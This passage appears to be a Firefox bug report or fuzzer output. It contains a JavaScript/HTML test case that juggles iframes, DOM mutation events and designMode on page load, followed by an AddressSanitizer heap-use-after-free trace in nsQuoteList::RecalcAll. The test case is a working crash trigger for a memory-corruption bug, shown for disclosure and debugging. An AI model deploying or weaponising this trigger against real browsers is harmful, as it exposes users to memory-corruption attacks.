	o224=document.createElementNS('http://www.w3.org/1999/xhtml','audio');
	o264=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	document.documentElement.appendChild(o264);
	o326=document.createElementNS('http://www.w3.org/1999/xhtml','td');
        window.top.document.documentElement.appendChild(o224);
        o186.prepend(undefined,undefined);
        o326.appendChild(o186);
        o531=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	document.body.onerror=fun0;
	o224.after(undefined,o531,o326);
}
function fun0() {
	o625=o531.contentWindow;
	o683=document.createElementNS('http://www.w3.org/1999/xhtml','h6');
	window.top.document.documentElement.appendChild(o264);
	o683.innerHTML="&lt;q cellpadding&gt;";
	document.documentElement.addEventListener('DOMAttrModified',fun1);
	document.documentElement.setAttribute('step','0');
}
var c=0;
function fun1() {
	if(c++!=0)fun2();
	else {
		document.documentElement.style.position='relative';
		o1040=document.createElementNS('http://www.w3.org/1999/xhtml','iframe'); // hopefully
		document.documentElement.appendChild(o1040);
		o1099=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
		document.documentElement.appendChild(o1099);
		o1115=o1099.contentWindow;
	        o1305=o625.document;
	        o1319=window.top.frames[1];
	        o1357=o1319.document;
	        o1358=o1040.contentWindow;
	        o1359=o1358.document;
	        o1360=o1359.documentElement;
	        o1363=o1115.document;
	        o1364=o1363.documentElement;
		o1403=o1305.documentElement;
	        o1412=function() {let x=o1357.querySelectorAll('*:not([id])');return x[x.length-1]}();
	        o1449=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	        o1449.src="data:text/html,x";
	        o1403.appendChild(o1449);
	       	o1364.appendChild(o921);
        	window.top.document.documentElement.appendChild(o1360);
	        o1360.innerHTML="&lt;q id==&gt;&lt;hgroup&gt;";;
		window.top.document.documentElement.appendChild(o683);
		o1412.onpagehide=fun3;
	}
}
function fun2() {
	o850=(new DOMParser()).parseFromString('&lt;dl contenteditable&gt;','text/html');
	o921=o850.all[2];
	o1.designMode='on';
}
function fun3() {
	o2034=document.createElementNS('http://www.w3.org/1999/xhtml','style');
	o2034.style.display='ruby-text';
	window.top.document.documentElement.appendChild(o2034);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==12107==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600029a568 at pc 0x7ff785f8a2d8 bp 0x7ffc107c2de0 sp 0x7ffc107c2dd8
READ of size 8 at 0x60600029a568 thread T0
    #0 0x7ff785f8a2d7 in getNext /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:206:41
    #1 0x7ff785f8a2d7 in Next /home/worker/workspace/build/src/layout/base/nsGenConList.h:94
    #2 0x7ff785f8a2d7 in Next /home/worker/workspace/build/src/layout/base/nsQuoteList.h:80
    #3 0x7ff785f8a2d7 in nsQuoteList::RecalcAll() /home/worker/workspace/build/src/layout/base/nsQuoteList.cpp:77
    #4 0x7ff785d972ae in nsCSSFrameConstructor::RecalcQuotesAndCounters() /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8723:5
    #5 0x7ff785f4fb08 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4192:7
    #6 0x7ff781f4f2f0 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7774:7
    #7 0x7ff781f4f110 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7752:5
    #8 0x7ff781f4f110 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7752:5
    #9 0x7ff780f97da3 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:683:9
    #10 0x7ff780f9a304 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #11 0x7ff780f9aebc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #12 0x7ff77f54b2ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #13 0x7ff77f54766f in mozilla::net::nsLoadGroup::Cancel(nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:270:15
    #14 0x7ff780f9782f in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:243:10
    #15 0x7ff780f976a8 in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:240:3
    #16 0x7ff786bbf041 in Stop /home/worker/workspace/build/src/docshell/base/nsDocShell.h:189:12
    #17 0x7ff786bbf041 in nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5547
    #18 0x7ff786be4bed in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsAString_internal const&amp;, char const*, nsAString_internal const&amp;, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString_internal const&amp;, nsIDocShell*, nsIURI*, nsIDocShell**, nsIRequest**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10631:12
    #19 0x7ff786bdc794 in nsDocShell::LoadURI(nsIURI*, nsIDocShellLoadInfo*, unsigned int, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1560:10
    #20 0x7ff781fb86dc in nsFrameLoader::ReallyStartLoadingInternal() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:596:8
    #21 0x7ff781f297f9 in ReallyStartLoading /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:480:17
    #22 0x7ff781f297f9 in nsDocument::MaybeInitializeFinalizeFrameLoaders() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:6913
    #23 0x7ff781f290d7 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:4797:3
    #24 0x7ff78416390c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2424:3
    #25 0x7ff782025574 in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:7
    #26 0x7ff782025574 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2521
    #27 0x7ff782021293 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1850:12
    #28 0x7ff782021293 in nsINode::After(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1809
    #29 0x7ff783483b8b in mozilla::dom::ElementBinding::after(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3483:3
    #30 0x7ff7839b8af0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2879:13
    #31 0x7ff789be2f55 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #32 0x7ff789be2f55 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #33 0x7ff789bc335f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #34 0x7ff789bc335f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #35 0x7ff789ba851d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #36 0x7ff789be35bf in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #37 0x7ff789be3c02 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #38 0x7ff7896b60ad in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #39 0x7ff7833be7ff in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #40 0x7ff783db498a in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #41 0x7ff783db498a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #42 0x7ff783d8099d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #43 0x7ff783d823c7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #44 0x7ff783d6d4f6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #45 0x7ff783d70b88 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #46 0x7ff785ea6a8c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1023:7
    #47 0x7ff786c3499b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7630:5
    #48 0x7ff786c307a4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7434:7
    #49 0x7ff786c37e0f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7331:13
    #50 0x7ff780f9c510 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #51 0x7ff780f9b4a8 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #52 0x7ff780f98208 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #53 0x7ff780f9a304 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #54 0x7ff780f9aebc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #55 0x7ff77f54b2ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #56 0x7ff781f56a86 in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8640:7
    #57 0x7ff781f56456 in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8568:9
    #58 0x7ff781f2c904 in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5055:3
    #59 0x7ff781feaf72 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #60 0x7ff781feaf72 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #61 0x7ff781feaf72 in mozilla::detail::RunnableMethodImpl&lt;void (nsDocument::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #62 0x7ff77f3773bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #63 0x7ff77f3f678c in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #64 0x7ff78017212f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #65 0x7ff7800e47a8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #66 0x7ff7800e47a8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #67 0x7ff7800e47a8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #68 0x7ff7855b653f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #69 0x7ff7875a9f21 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #70 0x7ff7877325ce in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #71 0x7ff787733add in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #72 0x7ff78773499c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #73 0x4df8ca in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #74 0x4df8ca in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #75 0x7ff79a38a82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #76 0x41ba38 in _start (/home/nils/fuzzer3/esr/firefox/firefox+0x41ba38)
0x60600029a568 is located 8 bytes inside of 64-byte region [0x60600029a560,0x60600029a5a0)
freed by thread T0 here:
    #0 0x4b218b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7ff785e2136f in Destroy /home/worker/workspace/build/src/layout/base/nsGenConList.h:124:5
    #2 0x7ff785e2136f in nsGenConList::DestroyNodesFor(nsIFrame*) /home/worker/workspace/build/src/layout/base/nsGenConList.cpp:40
    #3 0x7ff785d5317c in nsCSSFrameConstructor::NotifyDestroyingFrame(nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:1612:9
    #4 0x7ff785f3e4ab in PresShell::NotifyDestroyingFrame(nsIFrame*) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:2052:5
    #5 0x7ff78607413c in nsFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:726:3
    #6 0x7ff786021408 in DestroyFramesFrom /home/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:5
    #7 0x7ff786021408 in nsContainerFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:221
    #8 0x7ff7861c5508 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&amp;, nsIFrame*, nsFrameList*) /home/worker/workspace/build/src/layout/generic/nsLineBox.cpp:389:7
    #9 0x7ff786020864 in nsBlockFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:326:3
    #10 0x7ff7861c5508 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&amp;, nsIFrame*, nsFrameList*) /home/worker/workspace/build/src/layout/generic/nsLineBox.cpp:389:7
    #11 0x7ff786020864 in nsBlockFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:326:3
    #12 0x7ff7861c5508 in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&amp;, nsIFrame*, nsFrameList*) /home/worker/workspace/build/src/layout/generic/nsLineBox.cpp:389:7
    #13 0x7ff786020864 in nsBlockFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:326:3
    #14 0x7ff786021408 in DestroyFramesFrom /home/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:5
    #15 0x7ff786021408 in nsContainerFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:221
    #16 0x7ff786081ef5 in nsCanvasFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:153:3
    #17 0x7ff786021408 in DestroyFramesFrom /home/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:5
    #18 0x7ff786021408 in nsContainerFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:221
    #19 0x7ff7860952aa in Destroy /home/worker/workspace/build/src/layout/generic/nsIFrame.h:576:20
    #20 0x7ff7860952aa in nsContainerFrame::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:170
    #21 0x7ff785ec4596 in nsFrameManager::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:506:5
    #22 0x7ff785d9407b in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags, bool*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8498:5
    #23 0x7ff785d091ce in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9683:10
    #24 0x7ff785d91c35 in nsCSSFrameConstructor::WipeContainingBlock(nsFrameConstructorState&amp;, nsIFrame*, nsIFrame*, nsCSSFrameConstructor::FrameConstructionItemList&amp;, bool, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12458:7
    #25 0x7ff785d8e056 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7491:7
    #26 0x7ff785f521c8 in PresShell::ContentAppended(nsIDocument*, nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4393:3
    #27 0x7ff782076abc in nsNodeUtils::ContentAppended(nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:167:3
    #28 0x7ff78201ed72 in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1628:7
    #29 0x7ff7820254d6 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2514:14
    #30 0x7ff7826cfaf5 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1850:12
    #31 0x7ff7826cfaf5 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1854
    #32 0x7ff7826cfaf5 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:696
    #33 0x7ff7839b8af0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2879:13
    #34 0x7ff789be2f55 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #35 0x7ff789be2f55 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #36 0x7ff789bc335f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #37 0x7ff789bc335f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #38 0x7ff789ba851d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
previously allocated by thread T0 here:
    #0 0x4b24ab in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0d9d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7ff785d53fc0 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7ff785d53fc0 in nsCSSFrameConstructor::CreateGeneratedContent(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, unsigned int) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:1761
    #4 0x7ff785d5630d in nsCSSFrameConstructor::CreateGeneratedContentItem(nsFrameConstructorState&amp;, nsContainerFrame*, nsIContent*, nsStyleContext*, mozilla::CSSPseudoElementType, nsCSSFrameConstructor::FrameConstructionItemList&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:1906:7
    #5 0x7ff785d81c8c in nsCSSFrameConstructor::BuildInlineChildItems(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, bool, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12152:5
    #6 0x7ff785d596e2 in nsCSSFrameConstructor::AddFrameConstructionItemsInternal(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsIAtom*, int, bool, nsStyleContext*, unsigned int, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;*, nsCSSFrameConstructor::FrameConstructionItemList&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5993:5
    #7 0x7ff785d7aa1a in DoAddFrameConstructionItems /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5636:3
    #8 0x7ff785d7aa1a in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&amp;, nsIContent*, bool, nsCSSFrameConstructor::InsertionPoint const&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5658
    #9 0x7ff785d5f4f3 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10823:9
    #10 0x7ff785d69efd in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11851:3
    #11 0x7ff785d72bf2 in nsCSSFrameConstructor::ConstructNonScrollableBlockWithConstructor(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&amp;, nsBlockFrame* (*)(nsIPresShell*, nsStyleContext*)) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4948:3
    #12 0x7ff785d7bea7 in nsCSSFrameConstructor::ConstructNonScrollableBlock(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItem&amp;, nsContainerFrame*, nsStyleDisplay const*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4912:10
    #13 0x7ff785d75c32 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:3845:7
    #14 0x7ff785d82ea6 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6187:3
    #15 0x7ff785d8b2d4 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10629:5
    #16 0x7ff785d8b2d4 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8057
    #17 0x7ff785d0947b in ContentInserted /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7630:10
    #18 0x7ff785d0947b in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9697
    #19 0x7ff785d27586 in mozilla::RestyleManagerBase::ProcessRestyledFrames(nsStyleChangeList&amp;) /home/worker/workspace/build/src/layout/base/RestyleManagerBase.cpp:1176:7
    #20 0x7ff785d2e499 in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:105:5
    #21 0x7ff785d2e499 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:266
    #22 0x7ff785d10364 in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:490:7
    #23 0x7ff785d10364 in mozilla::RestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:834
    #24 0x7ff785f4f92e in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #25 0x7ff785f4f92e in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4159
    #26 0x7ff781f4f2f0 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7774:7
    #27 0x7ff781f4f110 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7752:5
    #28 0x7ff781f4f110 in nsDocument::FlushPendingNotifications(mozFlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7752:5
    #29 0x7ff780f97da3 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:683:9
    #30 0x7ff780f9a304 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #31 0x7ff780f9aebc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #32 0x7ff77f54b2ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #33 0x7ff77f54766f in mozilla::net::nsLoadGroup::Cancel(nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:270:15
    #34 0x7ff780f9782f in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:243:10
    #35 0x7ff780f976a8 in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:240:3
    #36 0x7ff786bbf041 in Stop /home/worker/workspace/build/src/docshell/base/nsDocShell.h:189:12
    #37 0x7ff786bbf041 in nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5547
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:206:41 in getNext
Shadow bytes around the buggy address:
  0x0c0c8004b450: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
